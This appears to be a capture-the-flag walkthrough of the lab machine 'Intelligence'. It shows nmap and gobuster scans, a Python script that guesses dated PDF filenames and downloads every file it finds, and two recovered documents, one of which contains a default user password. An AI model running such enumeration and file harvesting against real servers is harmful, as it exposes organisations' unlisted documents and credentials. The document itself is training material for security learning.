└─$ nmap -p- -sSCV 10.10.10.248 --min-rate 999      
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 07:07 EST
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.79% done; ETC: 07:09 (0:01:49 remaining)
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.083s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-12 19:39:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T19:40:41+00:00; +7h29m15s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2026-01-12T18:46:06
|_Not valid after:  2026-04-19T00:50:40
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T19:40:42+00:00; +7h29m15s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2026-01-12T18:46:06
|_Not valid after:  2026-04-19T00:50:40
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2026-01-12T18:46:06
|_Not valid after:  2026-04-19T00:50:40
|_ssl-date: 2026-01-12T19:40:41+00:00; +7h29m15s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T19:40:42+00:00; +7h29m15s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2026-01-12T18:46:06
|_Not valid after:  2026-04-19T00:50:40
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC



└─$ gobuster dir -u http://intelligence.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 111 
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://intelligence.htb
[+] Method:                  GET
[+] Threads:                 111
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/documents            (Status: 301) [Size: 157] [--> http://intelligence.htb/documents/]
/Documents            (Status: 301) [Size: 157] [--> http://intelligence.htb/Documents/]


to identify pdf in this dir, write a simple py script
```
import requests

# request
def req(url):
    resp = requests.get(url) 
    if resp.status_code == 200:
        print("Find: ", middle + ext )
        return resp.content
    else:
        return None
 
# # set url
base = 'http://intelligence.htb/documents/2020-'

ext = '-upload.pdf'

for i in range(12):
    i += 1
    if i < 10:
        mon  = '0' + str(i)
    else:
        mon = str(i)   
    # day
    for j in range(31):
        j += 1
        if j <10:
            day = '0' + str(j)
        else:
            day = str(j)
        middle = mon  + '-' + day
        url = base + middle + ext
        
        content = req(url)
        #write to host
        if content:
            with open(middle + ext , 'wb') as f:
                f.write(content)
```


                                                                                                 
┌──(ed㉿kali)-[/tmp]
└─$ python3 req.py
Find:  01-01-upload.pdf
Find:  01-02-upload.pdf
Find:  01-04-upload.pdf
Find:  01-10-upload.pdf
Find:  01-20-upload.pdf
Find:  01-22-upload.pdf
Find:  01-23-upload.pdf
Find:  01-25-upload.pdf
Find:  01-30-upload.pdf
Find:  02-11-upload.pdf
Find:  02-17-upload.pdf
Find:  02-23-upload.pdf
Find:  02-24-upload.pdf
Find:  02-28-upload.pdf
Find:  03-04-upload.pdf
Find:  03-05-upload.pdf
Find:  03-12-upload.pdf
Find:  03-13-upload.pdf
Find:  03-17-upload.pdf
Find:  03-21-upload.pdf
Find:  04-02-upload.pdf
Find:  04-04-upload.pdf
Find:  04-15-upload.pdf
Find:  04-23-upload.pdf
Find:  05-01-upload.pdf
Find:  05-03-upload.pdf
Find:  05-07-upload.pdf
Find:  05-11-upload.pdf
Find:  05-17-upload.pdf
Find:  05-20-upload.pdf
Find:  05-21-upload.pdf
Find:  05-24-upload.pdf
Find:  05-29-upload.pdf
Find:  06-02-upload.pdf
Find:  06-03-upload.pdf
Find:  06-04-upload.pdf
Find:  06-07-upload.pdf
Find:  06-08-upload.pdf
Find:  06-12-upload.pdf
Find:  06-14-upload.pdf
Find:  06-15-upload.pdf
Find:  06-21-upload.pdf
...[snip]...
Find:  12-24-upload.pdf
Find:  12-28-upload.pdf
Find:  12-30-upload.pdf


in 06-04 find a credential:

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

12-30
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.
